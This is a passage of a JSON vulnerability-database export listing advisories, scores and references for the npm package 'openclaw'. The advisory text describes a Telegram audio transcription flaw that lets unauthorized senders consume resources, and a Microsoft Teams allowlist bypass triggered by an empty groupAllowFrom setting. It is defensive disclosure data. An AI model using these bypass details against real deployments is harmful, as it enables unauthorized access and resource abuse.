":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gq
db"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1k
d8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41393","GHSA-q9w8-cf67-r238"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g3hg-peh1-tudm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89500?format=json","vulnerability_id":"VCID-g8r6-x6s5-uydq","summary":"OpenClaw: Telegram audio preflight transcription enables resource consumption by unauthorized senders\n## Summary\nTelegram audio preflight transcription enables resource consumption by unauthorized senders\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still lets unauthorized Telegram group senders trigger audio preflight before allowlist enforcement, but the real impact is resource or billing burn rather than direct data exposure or host compromise.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c4fa8635d03943ffe9e294d501089521dca635c5` — 2026-03-30T12:19:31+01:00\n\nOpenClaw thanks @AntAISecurityLab for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41331","reference_id":"","reference_type":"","scores":[{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.1772","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17683","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00056","scoring_system":"epss","scoring_elements":"0.17714","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41331"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c4fa8635d03943ffe9e294d501089521dca635c5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c4fa8635d03943ffe9e294d501089521dca635c5"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/A
V:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m6fx-m8hc-572m","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m6fx-m8hc-572m"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41331","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41331"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-unauthorized-telegram-audio-preflight-transcription","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"S
SVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-unauthorized-telegram-audio-preflight-transcription"},{"reference_url":"https://github.com/advisories/GHSA-m6fx-m8hc-572m","reference_id":"GHSA-m6fx-m8hc-572m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m6fx-m8hc-572m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"
},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"
},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41331","GHSA-m6fx-m8hc-572m"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-g8r6-x6s5-uydq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91271?format=json","vulnerability_id":"VCID-g9jn-c2rf-byem","summary":"Duplicate Advisory: OpenClaw's MS Teams sender allowlist bypass when route allowlist is configured and sender allowlist is empty\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-g7cr-9h7q-4qxq. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.8 contains a sender allowlist bypass vulnerability in its Microsoft Teams plugin that allows unauthorized senders to bypass intended authorization checks. 
When a team/channel route allowlist is configured with an empty groupAllowFrom parameter, the message handler synthesizes wildcard sender authorization, permitting any sender in the matched team/channel to trigger replies in allowlisted Teams routes.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/88aee9161e0e6d32e810a25711e32a808a1777b2","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/88aee9161e0e6d32e810a25711e32a808a1777b2"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-in-microsoft-teams-plugin-via-route-allowlist-configuration","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-in-microsoft-teams-plugin-via-route-allowlist-configuration"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34506","reference_id":"CVE-2026-34506","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0
/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34506"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g7cr-9h7q-4qxq","reference_id":"GHSA-g7cr-9h7q-4qxq","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g7cr-9h7q-4qxq"},{"reference_url":"https://github.com/advisories/GHSA-xg59-f45v-9r9j","reference_id":"GHSA-xg59-f45v-9r9j","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xg59-f45v-9r9j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26
kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7g
ju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cj
jd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cb